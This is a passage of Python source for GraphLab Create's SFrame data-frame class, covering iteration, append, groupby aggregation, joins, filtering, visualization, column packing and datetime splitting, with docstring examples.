def __delitem__(self, key):
"""
Wrapper around remove_column.
"""
self.remove_column(key)
def __materialize__(self):
"""
For an SFrame that is lazily evaluated, force the persistence of the
SFrame to disk, committing all lazy evaluated operations.
"""
with cython_context():
self.__proxy__.materialize()
def __is_materialized__(self):
"""
Returns whether or not the SFrame has been materialized.
"""
return self.__proxy__.is_materialized()
def __has_size__(self):
"""
Returns whether or not the size of the SFrame is known.
"""
return self.__proxy__.has_size()
def __iter__(self):
"""
Provides an iterator to the rows of the SFrame.
"""
_mt._get_metric_tracker().track('sframe.__iter__')
def generator():
elems_at_a_time = 262144
self.__proxy__.begin_iterator()
ret = self.__proxy__.iterator_get_next(elems_at_a_time)
column_names = self.column_names()
while(True):
for j in ret:
yield dict(zip(column_names, j))
if len(ret) == elems_at_a_time:
ret = self.__proxy__.iterator_get_next(elems_at_a_time)
else:
break
return generator()
def append(self, other):
"""
Add the rows of an SFrame to the end of this SFrame.
Both SFrames must have the same set of columns with the same column
names and column types.
Parameters
----------
other : SFrame
Another SFrame whose rows are appended to the current SFrame.
Returns
-------
out : SFrame
The result SFrame from the append operation.
Examples
--------
>>> sf = graphlab.SFrame({'id': [4, 6, 8], 'val': ['D', 'F', 'H']})
>>> sf2 = graphlab.SFrame({'id': [1, 2, 3], 'val': ['A', 'B', 'C']})
>>> sf = sf.append(sf2)
>>> sf
+----+-----+
| id | val |
+----+-----+
| 4 | D |
| 6 | F |
| 8 | H |
| 1 | A |
| 2 | B |
| 3 | C |
+----+-----+
[6 rows x 2 columns]
"""
_mt._get_metric_tracker().track('sframe.append')
if type(other) is not SFrame:
raise RuntimeError("SFrame append can only work with SFrame")
left_empty = len(self.column_names()) == 0
right_empty = len(other.column_names()) == 0
if (left_empty and right_empty):
return SFrame()
if (left_empty or right_empty):
non_empty_sframe = self if right_empty else other
return non_empty_sframe
my_column_names = self.column_names()
my_column_types = self.column_types()
other_column_names = other.column_names()
if (len(my_column_names) != len(other_column_names)):
raise RuntimeError("Two SFrames have to have the same number of columns")
# check if the order of column name is the same
column_name_order_match = True
for i in range(len(my_column_names)):
if other_column_names[i] != my_column_names[i]:
column_name_order_match = False
break;
processed_other_frame = other
if not column_name_order_match:
# we allow name order of two sframes to be different, so we create a new sframe from
# "other" sframe to make it has exactly the same shape
processed_other_frame = SFrame()
for i in range(len(my_column_names)):
col_name = my_column_names[i]
if(col_name not in other_column_names):
raise RuntimeError("Column " + my_column_names[i] + " does not exist in second SFrame")
other_column = other.select_column(col_name);
processed_other_frame.add_column(other_column, col_name)
# check column type
if my_column_types[i] != other_column.dtype():
raise RuntimeError("Column " + my_column_names[i] + " type is not the same in two SFrames, one is " + str(my_column_types[i]) + ", the other is " + str(other_column.dtype()))
with cython_context():
processed_other_frame.__materialize__()
return SFrame(_proxy=self.__proxy__.append(processed_other_frame.__proxy__))
def groupby(self, key_columns, operations, *args):
"""
Perform a group on the key_columns followed by aggregations on the
columns listed in operations.
The operations parameter is a dictionary that indicates which
aggregation operators to use and which columns to use them on. The
available operators are SUM, MAX, MIN, COUNT, AVG, VAR, STDV, CONCAT,
SELECT_ONE, ARGMIN, ARGMAX, and QUANTILE. For convenience, aggregators
MEAN, STD, and VARIANCE are available as synonyms for AVG, STDV, and
VAR. See :mod:`~graphlab.aggregate` for more detail on the aggregators.
Parameters
----------
key_columns : string | list[string]
Column(s) to group by. Key columns can be of any type other than
dictionary.
operations : dict, list
Dictionary of columns and aggregation operations. Each key is a
output column name and each value is an aggregator. This can also
be a list of aggregators, in which case column names will be
automatically assigned.
*args
All other remaining arguments will be interpreted in the same
way as the operations argument.
Returns
-------
out_sf : SFrame
A new SFrame, with a column for each groupby column and each
aggregation operation.
See Also
--------
aggregate
Examples
--------
Suppose we have an SFrame with movie ratings by many users.
>>> import graphlab.aggregate as agg
>>> url = 'http://s3.amazonaws.com/gl-testdata/rating_data_example.csv'
>>> sf = graphlab.SFrame.read_csv(url)
>>> sf
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| 25933 | 1663 | 4 |
| 25934 | 1663 | 4 |
| 25935 | 1663 | 4 |
| 25936 | 1663 | 5 |
| 25937 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Compute the number of occurrences of each user.
>>> user_count = sf.groupby(key_columns='user_id',
... operations={'count': agg.COUNT()})
>>> user_count
+---------+-------+
| user_id | count |
+---------+-------+
| 62361 | 1 |
| 30727 | 1 |
| 40111 | 1 |
| 50513 | 1 |
| 35140 | 1 |
| 42352 | 1 |
| 29667 | 1 |
| 46242 | 1 |
| 58310 | 1 |
| 64614 | 1 |
| ... | ... |
+---------+-------+
[9852 rows x 2 columns]
Compute the mean and standard deviation of ratings per user.
>>> user_rating_stats = sf.groupby(key_columns='user_id',
... operations={
... 'mean_rating': agg.MEAN('rating'),
... 'std_rating': agg.STD('rating')
... })
>>> user_rating_stats
+---------+-------------+------------+
| user_id | mean_rating | std_rating |
+---------+-------------+------------+
| 62361 | 5.0 | 0.0 |
| 30727 | 4.0 | 0.0 |
| 40111 | 2.0 | 0.0 |
| 50513 | 4.0 | 0.0 |
| 35140 | 4.0 | 0.0 |
| 42352 | 5.0 | 0.0 |
| 29667 | 4.0 | 0.0 |
| 46242 | 5.0 | 0.0 |
| 58310 | 2.0 | 0.0 |
| 64614 | 2.0 | 0.0 |
| ... | ... | ... |
+---------+-------------+------------+
[9852 rows x 3 columns]
Compute the movie with the minimum rating per user.
>>> chosen_movies = sf.groupby(key_columns='user_id',
... operations={
... 'worst_movies': agg.ARGMIN('rating','movie_id')
... })
>>> chosen_movies
+---------+-------------+
| user_id | worst_movies |
+---------+-------------+
| 62361 | 1663 |
| 30727 | 1663 |
| 40111 | 1663 |
| 50513 | 1663 |
| 35140 | 1663 |
| 42352 | 1663 |
| 29667 | 1663 |
| 46242 | 1663 |
| 58310 | 1663 |
| 64614 | 1663 |
| ... | ... |
+---------+-------------+
[9852 rows x 2 columns]
Compute the movie with the max rating per user and also the movie with
the maximum imdb-ranking per user.
>>> sf['imdb-ranking'] = sf['rating'] * 10
>>> chosen_movies = sf.groupby(key_columns='user_id',
... operations={('max_rating_movie','max_imdb_ranking_movie'): agg.ARGMAX(('rating','imdb-ranking'),'movie_id')})
>>> chosen_movies
+---------+------------------+------------------------+
| user_id | max_rating_movie | max_imdb_ranking_movie |
+---------+------------------+------------------------+
| 62361 | 1663 | 16630 |
| 30727 | 1663 | 16630 |
| 40111 | 1663 | 16630 |
| 50513 | 1663 | 16630 |
| 35140 | 1663 | 16630 |
| 42352 | 1663 | 16630 |
| 29667 | 1663 | 16630 |
| 46242 | 1663 | 16630 |
| 58310 | 1663 | 16630 |
| 64614 | 1663 | 16630 |
| ... | ... | ... |
+---------+------------------+------------------------+
[9852 rows x 3 columns]
Compute the movie with the max rating per user.
>>> chosen_movies = sf.groupby(key_columns='user_id',
operations={'best_movies': agg.ARGMAX('rating','movie')})
Compute the movie with the max rating per user and also the movie with the maximum imdb-ranking per user.
>>> chosen_movies = sf.groupby(key_columns='user_id',
operations={('max_rating_movie','max_imdb_ranking_movie'): agg.ARGMAX(('rating','imdb-ranking'),'movie')})
Compute the count, mean, and standard deviation of ratings per (user,
time), automatically assigning output column names.
>>> sf['time'] = sf.apply(lambda x: (x['user_id'] + x['movie_id']) % 11 + 2000)
>>> user_rating_stats = sf.groupby(['user_id', 'time'],
... [agg.COUNT(),
... agg.AVG('rating'),
... agg.STDV('rating')])
>>> user_rating_stats
+------+---------+-------+---------------+----------------+
| time | user_id | Count | Avg of rating | Stdv of rating |
+------+---------+-------+---------------+----------------+
| 2006 | 61285 | 1 | 4.0 | 0.0 |
| 2000 | 36078 | 1 | 4.0 | 0.0 |
| 2003 | 47158 | 1 | 3.0 | 0.0 |
| 2007 | 34446 | 1 | 3.0 | 0.0 |
| 2010 | 47990 | 1 | 3.0 | 0.0 |
| 2003 | 42120 | 1 | 5.0 | 0.0 |
| 2007 | 44940 | 1 | 4.0 | 0.0 |
| 2008 | 58240 | 1 | 4.0 | 0.0 |
| 2002 | 102 | 1 | 1.0 | 0.0 |
| 2009 | 52708 | 1 | 3.0 | 0.0 |
| ... | ... | ... | ... | ... |
+------+---------+-------+---------------+----------------+
[10000 rows x 5 columns]
The groupby function can take a variable length list of aggregation
specifiers so if we want the count and the 0.25 and 0.75 quantiles of
ratings:
>>> user_rating_stats = sf.groupby(['user_id', 'time'], agg.COUNT(),
... {'rating_quantiles': agg.QUANTILE('rating',[0.25, 0.75])})
>>> user_rating_stats
+------+---------+-------+------------------------+
| time | user_id | Count | rating_quantiles |
+------+---------+-------+------------------------+
| 2006 | 61285 | 1 | array('d', [4.0, 4.0]) |
| 2000 | 36078 | 1 | array('d', [4.0, 4.0]) |
| 2003 | 47158 | 1 | array('d', [3.0, 3.0]) |
| 2007 | 34446 | 1 | array('d', [3.0, 3.0]) |
| 2010 | 47990 | 1 | array('d', [3.0, 3.0]) |
| 2003 | 42120 | 1 | array('d', [5.0, 5.0]) |
| 2007 | 44940 | 1 | array('d', [4.0, 4.0]) |
| 2008 | 58240 | 1 | array('d', [4.0, 4.0]) |
| 2002 | 102 | 1 | array('d', [1.0, 1.0]) |
| 2009 | 52708 | 1 | array('d', [3.0, 3.0]) |
| ... | ... | ... | ... |
+------+---------+-------+------------------------+
[10000 rows x 4 columns]
To put all items a user rated into one list value by their star rating:
>>> user_rating_stats = sf.groupby(["user_id", "rating"],
... {"rated_movie_ids":agg.CONCAT("movie_id")})
>>> user_rating_stats
+--------+---------+----------------------+
| rating | user_id | rated_movie_ids |
+--------+---------+----------------------+
| 3 | 31434 | array('d', [1663.0]) |
| 5 | 25944 | array('d', [1663.0]) |
| 4 | 38827 | array('d', [1663.0]) |
| 4 | 51437 | array('d', [1663.0]) |
| 4 | 42549 | array('d', [1663.0]) |
| 4 | 49532 | array('d', [1663.0]) |
| 3 | 26124 | array('d', [1663.0]) |
| 4 | 46336 | array('d', [1663.0]) |
| 4 | 52133 | array('d', [1663.0]) |
| 5 | 62361 | array('d', [1663.0]) |
| ... | ... | ... |
+--------+---------+----------------------+
[9952 rows x 3 columns]
To put all items and rating of a given user together into a dictionary
value:
>>> user_rating_stats = sf.groupby("user_id",
... {"movie_rating":agg.CONCAT("movie_id", "rating")})
>>> user_rating_stats
+---------+--------------+
| user_id | movie_rating |
+---------+--------------+
| 62361 | {1663: 5} |
| 30727 | {1663: 4} |
| 40111 | {1663: 2} |
| 50513 | {1663: 4} |
| 35140 | {1663: 4} |
| 42352 | {1663: 5} |
| 29667 | {1663: 4} |
| 46242 | {1663: 5} |
| 58310 | {1663: 2} |
| 64614 | {1663: 2} |
| ... | ... |
+---------+--------------+
[9852 rows x 2 columns]
"""
# some basic checking first
# make sure key_columns is a list
if isinstance(key_columns, str):
key_columns = [key_columns]
# check that every column is a string, and is a valid column name
my_column_names = self.column_names()
key_columns_array = []
for column in key_columns:
if not isinstance(column, str):
raise TypeError("Column name must be a string")
if column not in my_column_names:
raise KeyError("Column " + column + " does not exist in SFrame")
if self[column].dtype() == dict:
raise TypeError("Cannot group on a dictionary column.")
key_columns_array.append(column)
group_output_columns = []
group_columns = []
group_ops = []
all_ops = [operations] + list(args)
for op_entry in all_ops:
# if it is not a dict, nor a list, it is just a single aggregator
# element (probably COUNT). wrap it in a list so we can reuse the
# list processing code
operation = op_entry
if not(isinstance(operation, list) or isinstance(operation, dict)):
operation = [operation]
if isinstance(operation, dict):
# now sweep the dict and add to group_columns and group_ops
for key in operation:
val = operation[key]
if type(val) is tuple:
(op, column) = val
if (op == '__builtin__avg__' and self[column[0]].dtype() is array.array):
op = '__builtin__vector__avg__'
if (op == '__builtin__sum__' and self[column[0]].dtype() is array.array):
op = '__builtin__vector__sum__'
if (op == '__builtin__argmax__' or op == '__builtin__argmin__') and ((type(column[0]) is tuple) != (type(key) is tuple)):
raise TypeError("Output column(s) and aggregate column(s) for aggregate operation should be either all tuple or all string.")
if (op == '__builtin__argmax__' or op == '__builtin__argmin__') and type(column[0]) is tuple:
for (col,output) in zip(column[0],key):
group_columns = group_columns + [[col,column[1]]]
group_ops = group_ops + [op]
group_output_columns = group_output_columns + [output]
else:
group_columns = group_columns + [column]
group_ops = group_ops + [op]
group_output_columns = group_output_columns + [key]
elif val == graphlab.aggregate.COUNT:
group_output_columns = group_output_columns + [key]
val = graphlab.aggregate.COUNT()
(op, column) = val
group_columns = group_columns + [column]
group_ops = group_ops + [op]
else:
raise TypeError("Unexpected type in aggregator definition of output column: " + key)
elif isinstance(operation, list):
# we will be using automatically defined column names
for val in operation:
if type(val) is tuple:
(op, column) = val
if (op == '__builtin__avg__' and self[column[0]].dtype() is array.array):
op = '__builtin__vector__avg__'
if (op == '__builtin__sum__' and self[column[0]].dtype() is array.array):
op = '__builtin__vector__sum__'
if (op == '__builtin__argmax__' or op == '__builtin__argmin__') and type(column[0]) is tuple:
for col in column[0]:
group_columns = group_columns + [[col,column[1]]]
group_ops = group_ops + [op]
group_output_columns = group_output_columns + [""]
else:
group_columns = group_columns + [column]
group_ops = group_ops + [op]
group_output_columns = group_output_columns + [""]
elif val == graphlab.aggregate.COUNT:
group_output_columns = group_output_columns + [""]
val = graphlab.aggregate.COUNT()
(op, column) = val
group_columns = group_columns + [column]
group_ops = group_ops + [op]
else:
raise TypeError("Unexpected type in aggregator definition.")
# let's validate group_columns and group_ops are valid
for (cols, op) in zip(group_columns, group_ops):
for col in cols:
if not isinstance(col, str):
raise TypeError("Column name must be a string")
if not isinstance(op, str):
raise TypeError("Operation type not recognized.")
if op is not graphlab.aggregate.COUNT()[0]:
for col in cols:
if col not in my_column_names:
raise KeyError("Column " + col + " does not exist in SFrame")
_mt._get_metric_tracker().track('sframe.groupby', properties={'operator':op})
with cython_context():
return SFrame(_proxy=self.__proxy__.groupby_aggregate(key_columns_array, group_columns,
group_output_columns, group_ops))
def join(self, right, on=None, how='inner'):
"""
Merge two SFrames. Merges the current (left) SFrame with the given
(right) SFrame using a SQL-style equi-join operation by columns.
Parameters
----------
right : SFrame
The SFrame to join.
on : None | str | list | dict, optional
The column name(s) representing the set of join keys. Each row that
has the same value in this set of columns will be merged together.
* If 'None' is given, join will use all columns that have the same
name as the set of join keys.
* If a str is given, this is interpreted as a join using one column,
where both SFrames have the same column name.
* If a list is given, this is interpreted as a join using one or
more column names, where each column name given exists in both
SFrames.
* If a dict is given, each dict key is taken as a column name in the
left SFrame, and each dict value is taken as the column name in
right SFrame that will be joined together. e.g.
{'left_col_name':'right_col_name'}.
how : {'left', 'right', 'outer', 'inner'}, optional
The type of join to perform. 'inner' is default.
* inner: Equivalent to a SQL inner join. Result consists of the
rows from the two frames whose join key values match exactly,
merged together into one SFrame.
* left: Equivalent to a SQL left outer join. Result is the union
between the result of an inner join and the rest of the rows from
the left SFrame, merged with missing values.
* right: Equivalent to a SQL right outer join. Result is the union
between the result of an inner join and the rest of the rows from
the right SFrame, merged with missing values.
* outer: Equivalent to a SQL full outer join. Result is
the union between the result of a left outer join and a right
outer join.
Returns
-------
out : SFrame
Examples
--------
>>> animals = graphlab.SFrame({'id': [1, 2, 3, 4],
... 'name': ['dog', 'cat', 'sheep', 'cow']})
>>> sounds = graphlab.SFrame({'id': [1, 3, 4, 5],
... 'sound': ['woof', 'baa', 'moo', 'oink']})
>>> animals.join(sounds, how='inner')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
+----+-------+-------+
[3 rows x 3 columns]
>>> animals.join(sounds, on='id', how='left')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
| 2 | cat | None |
+----+-------+-------+
[4 rows x 3 columns]
>>> animals.join(sounds, on=['id'], how='right')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
| 5 | None | oink |
+----+-------+-------+
[4 rows x 3 columns]
>>> animals.join(sounds, on={'id':'id'}, how='outer')
+----+-------+-------+
| id | name | sound |
+----+-------+-------+
| 1 | dog | woof |
| 3 | sheep | baa |
| 4 | cow | moo |
| 5 | None | oink |
| 2 | cat | None |
+----+-------+-------+
[5 rows x 3 columns]
"""
_mt._get_metric_tracker().track('sframe.join', properties={'type':how})
available_join_types = ['left','right','outer','inner']
if not isinstance(right, SFrame):
raise TypeError("Can only join two SFrames")
if how not in available_join_types:
raise ValueError("Invalid join type")
join_keys = dict()
if on is None:
left_names = self.column_names()
right_names = right.column_names()
common_columns = [name for name in left_names if name in right_names]
for name in common_columns:
join_keys[name] = name
elif type(on) is str:
join_keys[on] = on
elif type(on) is list:
for name in on:
if type(name) is not str:
raise TypeError("Join keys must each be a str.")
join_keys[name] = name
elif type(on) is dict:
join_keys = on
else:
raise TypeError("Must pass a str, list, or dict of join keys")
with cython_context():
return SFrame(_proxy=self.__proxy__.join(right.__proxy__, how, join_keys))
def filter_by(self, values, column_name, exclude=False):
"""
Filter an SFrame by values inside an iterable object. Result is an
SFrame that only includes (or excludes) the rows that have a column
with the given ``column_name`` which holds one of the values in the
given ``values`` :class:`~graphlab.SArray`. If ``values`` is not an
SArray, we attempt to convert it to one before filtering.
Parameters
----------
values : SArray | list | numpy.ndarray | pandas.Series | str
The values to use to filter the SFrame. The resulting SFrame will
only include rows that have one of these values in the given
column.
column_name : str
The column of the SFrame to match with the given `values`.
exclude : bool
If True, the result SFrame will contain all rows EXCEPT those that
have one of ``values`` in ``column_name``.
Returns
-------
out : SFrame
The filtered SFrame.
Examples
--------
>>> sf = graphlab.SFrame({'id': [1, 2, 3, 4],
... 'animal_type': ['dog', 'cat', 'cow', 'horse'],
... 'name': ['bob', 'jim', 'jimbob', 'bobjim']})
>>> household_pets = ['cat', 'hamster', 'dog', 'fish', 'bird', 'snake']
>>> sf.filter_by(household_pets, 'animal_type')
+-------------+----+------+
| animal_type | id | name |
+-------------+----+------+
| dog | 1 | bob |
| cat | 2 | jim |
+-------------+----+------+
[2 rows x 3 columns]
>>> sf.filter_by(household_pets, 'animal_type', exclude=True)
+-------------+----+--------+
| animal_type | id | name |
+-------------+----+--------+
| horse | 4 | bobjim |
| cow | 3 | jimbob |
+-------------+----+--------+
[2 rows x 3 columns]
"""
_mt._get_metric_tracker().track('sframe.filter_by')
if type(column_name) is not str:
raise TypeError("Must pass a str as column_name")
if type(values) is not SArray:
# If we were given a single element, try to put in list and convert
# to SArray
if not hasattr(values, '__iter__'):
values = [values]
values = SArray(values)
value_sf = SFrame()
value_sf.add_column(values, column_name)
# Make sure the values list has unique values, or else join will not
# filter.
value_sf = value_sf.groupby(column_name, {})
existing_columns = self.column_names()
if column_name not in existing_columns:
raise KeyError("Column '" + column_name + "' not in SFrame.")
existing_type = self.column_types()[self.column_names().index(column_name)]
given_type = value_sf.column_types()[0]
if given_type != existing_type:
raise TypeError("Type of given values does not match type of column '" +
column_name + "' in SFrame.")
with cython_context():
if exclude:
id_name = "id"
# Make sure this name is unique so we know what to remove in
# the result
while id_name in existing_columns:
id_name += "1"
value_sf = value_sf.add_row_number(id_name)
tmp = SFrame(_proxy=self.__proxy__.join(value_sf.__proxy__,
'left',
{column_name:column_name}))
ret_sf = tmp[tmp[id_name] == None]
del ret_sf[id_name]
return ret_sf
else:
return SFrame(_proxy=self.__proxy__.join(value_sf.__proxy__,
'inner',
{column_name:column_name}))
@_check_canvas_enabled
def show(self, columns=None, view=None, x=None, y=None):
"""
show(columns=None, view=None, x=None, y=None)
Visualize the SFrame with GraphLab Create :mod:`~graphlab.canvas`. This function
starts Canvas if it is not already running. If the SFrame has already been plotted,
this function will update the plot.
Parameters
----------
columns : list of str, optional
The columns of this SFrame to show in the SFrame view. In an
interactive browser target of Canvas, the columns will be selectable
and reorderable through the UI as well. If not specified, the
SFrame view will use all columns of the SFrame.
view : str, optional
The name of the SFrame view to show. Can be one of:
- None: Use the default (depends on which Canvas target is set).
- 'Table': Show a scrollable, tabular view of the data in the
SFrame.
- 'Summary': Show a list of columns with some summary statistics
and plots for each column.
- 'Scatter Plot': Show a scatter plot of two numeric columns.
- 'Heat Map': Show a heat map of two numeric columns.
- 'Bar Chart': Show a bar chart of one numeric and one categorical
column.
- 'Line Chart': Show a line chart of one numeric and one
categorical column.
x : str, optional
The column to use for the X axis in a Scatter Plot, Heat Map, Bar
Chart, or Line Chart view. Must be the name of one of the columns
in this SFrame. For Scatter Plot and Heat Map, the column must be
numeric (int or float). If not set, defaults to the first available
valid column.
y : str, optional
The column to use for the Y axis in a Scatter Plot, Heat Map, Bar
Chart, or Line Chart view. Must be the name of one of the numeric
columns in this SFrame. If not set, defaults to the second
available numeric column.
Returns
-------
view : graphlab.canvas.view.View
An object representing the GraphLab Canvas view.
See Also
--------
canvas
Examples
--------
Suppose 'sf' is an SFrame, we can view it in GraphLab Canvas using:
>>> sf.show()
To choose a column filter (applied to all SFrame views):
>>> sf.show(columns=["Foo", "Bar"]) # use only columns 'Foo' and 'Bar'
>>> sf.show(columns=sf.column_names()[3:7]) # use columns 3-7
To choose a specific view of the SFrame:
>>> sf.show(view="Summary")
>>> sf.show(view="Table")
>>> sf.show(view="Bar Chart", x="col1", y="col2")
>>> sf.show(view="Line Chart", x="col1", y="col2")
>>> sf.show(view="Scatter Plot", x="col1", y="col2")
>>> sf.show(view="Heat Map", x="col1", y="col2")
"""
import graphlab.canvas
import graphlab.canvas.inspect
import graphlab.canvas.views.sframe
graphlab.canvas.inspect.find_vars(self)
return graphlab.canvas.show(graphlab.canvas.views.sframe.SFrameView(self, params={
'view': view,
'columns': columns,
'x': x,
'y': y
}))
def pack_columns(self, columns=None, column_prefix=None, dtype=list,
fill_na=None, remove_prefix=True, new_column_name=None):
"""
Pack two or more columns of the current SFrame into one single
column.The result is a new SFrame with the unaffected columns from the
original SFrame plus the newly created column.
The list of columns that are packed is chosen through either the
``columns`` or ``column_prefix`` parameter. Only one of the parameters
is allowed to be provided. ``columns`` explicitly specifies the list of
columns to pack, while ``column_prefix`` specifies that all columns that
have the given prefix are to be packed.
The type of the resulting column is decided by the ``dtype`` parameter.
Allowed values for ``dtype`` are dict, array.array and list:
- *dict*: pack to a dictionary SArray where column name becomes
dictionary key and column value becomes dictionary value
- *array.array*: pack all values from the packing columns into an array
- *list*: pack all values from the packing columns into a list.
Parameters
----------
columns : list[str], optional
A list of column names to be packed. There needs to have at least
two columns to pack. If omitted and `column_prefix` is not
specified, all columns from current SFrame are packed. This
parameter is mutually exclusive with the `column_prefix` parameter.
column_prefix : str, optional
Pack all columns with the given `column_prefix`.
This parameter is mutually exclusive with the `columns` parameter.
dtype : dict | array.array | list, optional
The resulting packed column type. If not provided, dtype is list.
fill_na : value, optional
Value to fill into packed column if missing value is encountered.
If packing to dictionary, `fill_na` is only applicable to dictionary
values; missing keys are not replaced.
remove_prefix : bool, optional
If True and `column_prefix` is specified, the dictionary key will
be constructed by removing the prefix from the column name.
This option is only applicable when packing to dict type.
new_column_name : str, optional
Packed column name. If not given and `column_prefix` is given,
then the prefix will be used as the new column name, otherwise name
is generated automatically.
Returns
-------
out : SFrame
An SFrame that contains columns that are not packed, plus the newly
packed column.
See Also
--------
unpack
Notes
-----
- There must be at least two columns to pack.
- If packing to dictionary, missing key is always dropped. Missing
values are dropped if fill_na is not provided, otherwise, missing
value is replaced by 'fill_na'. If packing to list or array, missing
values will be kept. If 'fill_na' is provided, the missing value is
replaced with 'fill_na' value.
Examples
--------
Suppose 'sf' is an an SFrame that maintains business category
information:
>>> sf = graphlab.SFrame({'business': range(1, 5),
... 'category.retail': [1, None, 1, None],
... 'category.food': [1, 1, None, None],
... 'category.service': [None, 1, 1, None],
... 'category.shop': [1, 1, None, 1]})
>>> sf
+----------+-----------------+---------------+------------------+---------------+
| business | category.retail | category.food | category.service | category.shop |
+----------+-----------------+---------------+------------------+---------------+
| 1 | 1 | 1 | None | 1 |
| 2 | None | 1 | 1 | 1 |
| 3 | 1 | None | 1 | None |
| 4 | None | 1 | None | 1 |
+----------+-----------------+---------------+------------------+---------------+
[4 rows x 5 columns]
To pack all category columns into a list:
>>> sf.pack_columns(column_prefix='category')
+----------+--------------------+
| business | X2 |
+----------+--------------------+
| 1 | [1, 1, None, 1] |
| 2 | [None, 1, 1, 1] |
| 3 | [1, None, 1, None] |
| 4 | [None, 1, None, 1] |
+----------+--------------------+
[4 rows x 2 columns]
To pack all category columns into a dictionary, with new column name:
>>> sf.pack_columns(column_prefix='category', dtype=dict,
... new_column_name='category')
+----------+--------------------------------+
| business | category |
+----------+--------------------------------+
| 1 | {'food': 1, 'shop': 1, 're ... |
| 2 | {'food': 1, 'shop': 1, 'se ... |
| 3 | {'retail': 1, 'service': 1} |
| 4 | {'food': 1, 'shop': 1} |
+----------+--------------------------------+
[4 rows x 2 columns]
To keep column prefix in the resulting dict key:
>>> sf.pack_columns(column_prefix='category', dtype=dict,
remove_prefix=False)
+----------+--------------------------------+
| business | X2 |
+----------+--------------------------------+
| 1 | {'category.retail': 1, 'ca ... |
| 2 | {'category.food': 1, 'cate ... |
| 3 | {'category.retail': 1, 'ca ... |
| 4 | {'category.food': 1, 'cate ... |
+----------+--------------------------------+
[4 rows x 2 columns]
To explicitly pack a set of columns:
>>> sf.pack_columns(columns = ['business', 'category.retail',
'category.food', 'category.service',
'category.shop'])
+-----------------------+
| X1 |
+-----------------------+
| [1, 1, 1, None, 1] |
| [2, None, 1, 1, 1] |
| [3, 1, None, 1, None] |
| [4, None, 1, None, 1] |
+-----------------------+
[4 rows x 1 columns]
To pack all columns with name starting with 'category' into an array
type, and with missing value replaced with 0:
>>> sf.pack_columns(column_prefix="category", dtype=array.array,
... fill_na=0)
+----------+--------------------------------+
| business | X2 |
+----------+--------------------------------+
| 1 | array('d', [1.0, 1.0, 0.0, ... |
| 2 | array('d', [0.0, 1.0, 1.0, ... |
| 3 | array('d', [1.0, 0.0, 1.0, ... |
| 4 | array('d', [0.0, 1.0, 0.0, ... |
+----------+--------------------------------+
[4 rows x 2 columns]
"""
if columns != None and column_prefix != None:
raise ValueError("'columns' and 'column_prefix' parameter cannot be given at the same time.")
if new_column_name == None and column_prefix != None:
new_column_name = column_prefix
if column_prefix != None:
if type(column_prefix) != str:
raise TypeError("'column_prefix' must be a string")
columns = [name for name in self.column_names() if name.startswith(column_prefix)]
if len(columns) == 0:
raise ValueError("There is no column starts with prefix '" + column_prefix + "'")
elif columns == None:
columns = self.column_names()
else:
if not hasattr(columns, '__iter__'):
raise TypeError("columns must be an iterable type")
column_names = set(self.column_names())
for column in columns:
if (column not in column_names):
raise ValueError("Current SFrame has no column called '" + str(column) + "'.")
# check duplicate names
if len(set(columns)) != len(columns):
raise ValueError("There is duplicate column names in columns parameter")
if (len(columns) <= 1):
raise ValueError("Please provide at least two columns to pack")
if (dtype not in (dict, list, array.array)):
raise ValueError("Resulting dtype has to be one of dict/array.array/list type")
# fill_na value for array needs to be numeric
if dtype == array.array:
if (fill_na != None) and (type(fill_na) not in (int, float)):
raise ValueError("fill_na value for array needs to be numeric type")
# all columns have to be numeric type
for column in columns:
if self[column].dtype() not in (int, float):
raise TypeError("Column '" + column + "' type is not numeric, cannot pack into array type")
# generate dict key names if pack to dictionary
# we try to be smart here
# if all column names are like: a.b, a.c, a.d,...
# we then use "b", "c", "d", etc as the dictionary key during packing
if (dtype == dict) and (column_prefix != None) and (remove_prefix == True):
size_prefix = len(column_prefix)
first_char = set([c[size_prefix:size_prefix+1] for c in columns])
if ((len(first_char) == 1) and first_char.pop() in ['.','-','_']):
dict_keys = [name[size_prefix+1:] for name in columns]
else:
dict_keys = [name[size_prefix:] for name in columns]
else:
dict_keys = columns
rest_columns = [name for name in self.column_names() if name not in columns]
if new_column_name != None:
if type(new_column_name) != str:
raise TypeError("'new_column_name' has to be a string")
if new_column_name in rest_columns:
raise KeyError("Current SFrame already contains a column name " + new_column_name)
else:
new_column_name = ""
_mt._get_metric_tracker().track('sframe.pack_columns')
ret_sa = None
with cython_context():
ret_sa = SArray(_proxy=self.__proxy__.pack_columns(columns, dict_keys, dtype, fill_na))
new_sf = self.select_columns(rest_columns)
new_sf.add_column(ret_sa, new_column_name)
return new_sf
def split_datetime(self, expand_column, column_name_prefix=None, limit=None, tzone=False):
"""
Splits a datetime column of SFrame to multiple columns, with each value in a
separate column. Returns a new SFrame with the expanded column replaced with
a list of new columns. The expanded column must be of datetime type.
For more details regarding name generation and
other, refer to :py:func:`graphlab.SArray.split_datetim()`
Parameters
----------
expand_column : str
Name of the unpacked column.
column_name_prefix : str, optional
If provided, expanded column names would start with the given prefix.
If not provided, the default value is the name of the expanded column.
limit : list[str], optional
Limits the set of datetime elements to expand.
Elements are 'year','month','day','hour','minute',
and 'second'.
tzone : bool, optional
A boolean parameter that determines whether to show the timezone
column or not. Defaults to False.
Returns
-------
out : SFrame
A new SFrame that contains rest of columns from original SFrame with
the given column replaced with a collection of expanded columns.
Examples
---------
>>> sf
Columns:
id int
submission datetime
Rows: 2
Data:
+----+-------------------------------------------------+
| id | submission |
+----+-------------------------------------------------+
| 1 | datetime(2011, 1, 21, 7, 17, 21, tzinfo=GMT(+1))|
| 2 | datetime(2011, 1, 21, 5, 43, 21, tzinfo=GMT(+1))|
+----+-------------------------------------------------+
>>> sf.split_datetime('submission',limit=['hour','minute'])
Columns:
id int
submission.hour int
submission.minute int
Rows: 2
Data:
+----+-----------------+-------------------+
| id | submission.hour | submission.minute |
+----+-----------------+-------------------+
| 1 | 7 | 17 |
